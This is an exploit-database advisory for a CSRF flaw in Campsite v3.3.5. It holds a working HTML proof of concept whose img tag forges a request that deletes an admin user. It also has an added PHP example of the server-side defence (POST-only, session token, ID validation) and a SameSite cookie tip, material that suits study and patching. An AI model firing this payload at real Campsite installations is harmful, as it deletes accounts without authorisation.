0day Today Exploits Market and 0day Exploits Database

Campsite v3.3.5 CSRF Vulnerability

Author: Pratul Agrawal
Risk: [ Security Risk Unsorted ]
0day-ID: 0day-ID-11239
Category: web applications
Date added: 10-03-2010
Platform: unsorted
==================================
Campsite v3.3.5 CSRF Vulnerability
==================================

  # Site p4ge     http://wwwcampware.org/

  # Platform      php

  #  Proof of concept   #
  
  Targeted URL:  http://server/admin/login.php
   
  
  Script to delete the Admin user through Cross Site request forgery

      <html>
        <body>
          <img src="http://server/admin/users/do_del.php?User=[userID]&uType=Staff" />
        </body>
      </html>

  After the request executes, refresh the page; the user with the given ID has been deleted automatically.
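
  The PoC works because do_del.php acts on a plain GET request that carries no per-session secret. The server-side checks that stop the forged request are sketched below as an added example; it is not Campsite's code and not part of the original advisory. handle_delete_user(), csrf_token() and the csrf_token form field are hypothetical names, and the requests are constructed.

```php
<?php
// Added example, not Campsite code. Function and field names are hypothetical.

// Issue one unpredictable token per session; embed it in every admin form.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Returns [HTTP status, message]. $params is $_POST for a real request.
function handle_delete_user(string $method, array $params, array &$session): array {
    // 1. Deletion must not be reachable via GET: <img> tags only issue GET.
    if ($method !== 'POST') {
        return [405, 'Method Not Allowed'];
    }
    // 2. Require the session-bound token; compare in constant time.
    $sent = $params['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return [403, 'Missing or invalid CSRF token'];
    }
    // 3. Validate the target ID before acting on it.
    $id = filter_var($params['User'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [400, 'Bad user ID'];
    }
    // The real handler would delete the user here.
    return [200, "User $id deleted"];
}

// Constructed requests against one admin session.
$session = [];
$token = csrf_token($session);
$cases = [
    'forged GET (img tag)'   => ['GET',  ['User' => '7', 'uType' => 'Staff']],
    'forged POST, no token'  => ['POST', ['User' => '7', 'uType' => 'Staff']],
    'forged POST, bad token' => ['POST', ['User' => '7', 'csrf_token' => 'guess']],
    'legitimate admin form'  => ['POST', ['User' => '7', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $params]) {
    [$status, $msg] = handle_delete_user($method, $params, $session);
    printf("%-24s -> %d %s\n", $label, $status, $msg);
}
```

  Setting the session cookie's SameSite attribute to Lax or Strict adds a second layer, since the browser then withholds the cookie on cross-site image requests.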
  


#  0day.today [2024-10-05]  #